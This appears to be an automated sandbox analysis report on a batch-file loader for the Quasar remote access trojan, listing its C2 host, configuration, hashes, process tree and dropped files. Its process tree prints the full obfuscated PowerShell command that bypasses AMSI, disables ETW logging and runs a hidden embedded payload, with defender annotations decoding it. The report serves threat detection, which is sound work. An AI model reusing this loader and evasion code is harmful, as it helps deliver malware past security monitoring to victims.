Analysis

  • max time kernel
    16s
  • max time network
    25s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    25-11-2024 23:43

General

  • Target

    Client-built.exe.bat (a Windows batch script despite the ".exe" in its name; it is executed via cmd.exe /c, see the process tree below)

  • Size

    4.2MB

  • MD5

    e8f9b123f6368338546d660e983af6b0

  • SHA1

    d622ddcfbba5060244816540768925563a7c66c3

  • SHA256

    4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

  • SHA512

    6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c

  • SSDEEP

    49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

    kdotisbetterfr.airdns.org:61875 (appears to be a dynamic-DNS hostname; detect on the hostname/port rather than pinning a single resolved IP)

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open-source remote access trojan (RAT). The extracted configuration above provides concrete indicators: the C2 host and port, the mutex GUID, the install name and subdirectory (Client.exe / SubDir), and the startup key name "Quasar Client Startup" used for persistence.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    The batch file is run by cmd.exe /c and hands off to powershell.exe with -exec bypass and a heavily obfuscated command. Resolving the pieces visible in the command line: the [char] arithmetic yields Test-Path, iex, Get-Content and Select-String, and the base64/byte-array strings decode to $ENV:userprofile\Downloads\ResumeGrant.sys, System.Management.Automation.AmsiUtils, amsiInitFailed, System.Diagnostics.Eventing.EventProvider (field m_enabled), System.Management.Automation.Tracing.PSEtwLogProvider (field etwProvider) and the regex ::KDOT::(.*). Read in order, the script exits if that Downloads file already exists, sets AmsiUtils.amsiInitFailed to a true value via reflection (AMSI bypass), writes 0 into the PowerShell ETW provider's m_enabled field (blinds ETW/script-block logging), then reads the batch file itself with Get-Content -Raw, extracts the base64 text following the ::KDOT:: marker, decodes it and executes it with iex. The csc.exe/cvtres.exe children and the v1dllrpc.* files listed under dropped files are consistent with that decoded stage compiling a small C# helper at runtime (Add-Type style), and the Quasar payload detection on PID 2888 suggests the RAT is loaded into the PowerShell process rather than written to disk as Client.exe during this run. The powershell command line itself (-exec bypass together with [REF].Assembly.GetType, amsiInitFailed and PSEtwLogProvider) is the earliest reliable host indicator.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 
118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + 
(-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2888
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3360
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\v1dllrpc\CSCC06B575DB96C4F8CAA2F2FE29D693C5.TMP"
          4⤵
            PID:396


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp

      Filesize

      1KB

      MD5

      96d39d35df7ca54a90ee1644c8362156

      SHA1

      c299e8b3856f1613f58d40a6b9ae172efcb5d6ab

      SHA256

      04620dcd3f1ad1f53431f00ce5ea3b9de55bdbf4c3326d26a75877c0077006f2

      SHA512

      724f63d716ecbecc3feed2982cce6e98901f779bef231f545d8098a96ef93596085fb8bf5d11282bc44bc0bd86ad2d620cc624411ed9e00638f48e6603b35e3a

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ps0funf.g34.ps1 (standard artifact PowerShell writes to probe script-execution policy at startup; not attacker-dropped content, so not a useful IoC)

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.dll

      Filesize

      8KB

      MD5

      06a326a86ed4abe0cdab78c026a4bd4f

      SHA1

      fd5f74477f7d5f3d622bcb969e5d6682f7b2c68b

      SHA256

      b51cf33acc8cb44127fd437a7862a2aeee5823c4aaf663d1cd8dcdfb1268b76c

      SHA512

      d5397d097b95cf933a8b9c8368735f8a2292a68089b9461c4227f2e639a35fc33478aeba7e1a8d61282272c0c2c4a080026d86ac0a1df8728858021b7b125b2a

    • \??\c:\Users\Admin\AppData\Local\Temp\v1dllrpc\CSCC06B575DB96C4F8CAA2F2FE29D693C5.TMP

      Filesize

      652B

      MD5

      a762f892605c3c0a7c68fb5cd49fba3a

      SHA1

      a5e91b4b9396374b57b777ecde97d96cc9c73ff4

      SHA256

      c1b93fc5488d50740a610795908f578548b57d204a7255db7c1924e00f5f3b5d

      SHA512

      246eda5b9db5a18126493e8eca2cce74500ec1347b46ae831d05e2bbc8eda717a6aa307ad685fed84a2e92ae4e18c419a4de2eca49903e25c541f45e2bbebbcc

    • \??\c:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.0.cs

      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

    • \??\c:\Users\Admin\AppData\Local\Temp\v1dllrpc\v1dllrpc.cmdline

      Filesize

      369B

      MD5

      f9463f7ac16d9801a2e352b2c546e71b

      SHA1

      165b3b3e2d4e0d0b1638df856b568621d8c649ed

      SHA256

      67437cdc07ec7a0a298cce20ae612540a060b51825b191a80bff77f19671462a

      SHA512

      7ab35f5943e9334fae099fd3e1eaf09aa66ee339b3c555a31535cdf1ed8e555f759aa2db14e56e3c0b832e9a7578ff9cf59a259698e3647c939947f224f4c494

    • memory/2888-26-0x00000273706B0000-0x00000273706B8000-memory.dmp

      Filesize

      32KB

    • memory/2888-29-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

      Filesize

      10.8MB

    • memory/2888-12-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

      Filesize

      10.8MB

    • memory/2888-11-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

      Filesize

      10.8MB

    • memory/2888-0-0x00007FFD8AC73000-0x00007FFD8AC75000-memory.dmp

      Filesize

      8KB

    • memory/2888-2-0x00000273706C0000-0x00000273706E2000-memory.dmp

      Filesize

      136KB

    • memory/2888-28-0x00007FFD8AC73000-0x00007FFD8AC75000-memory.dmp

      Filesize

      8KB

    • memory/2888-13-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

      Filesize

      10.8MB

    • memory/2888-30-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

      Filesize

      10.8MB

    • memory/2888-31-0x00007FFD8AC70000-0x00007FFD8B732000-memory.dmp

      Filesize

      10.8MB

    • memory/2888-32-0x0000027370BD0000-0x0000027370EF4000-memory.dmp

      Filesize

      3.1MB

    • memory/2888-33-0x0000027371440000-0x0000027371490000-memory.dmp

      Filesize

      320KB

    • memory/2888-34-0x0000027371F70000-0x0000027372022000-memory.dmp

      Filesize

      712KB

    • memory/2888-35-0x0000027372200000-0x00000273723C2000-memory.dmp

      Filesize

      1.8MB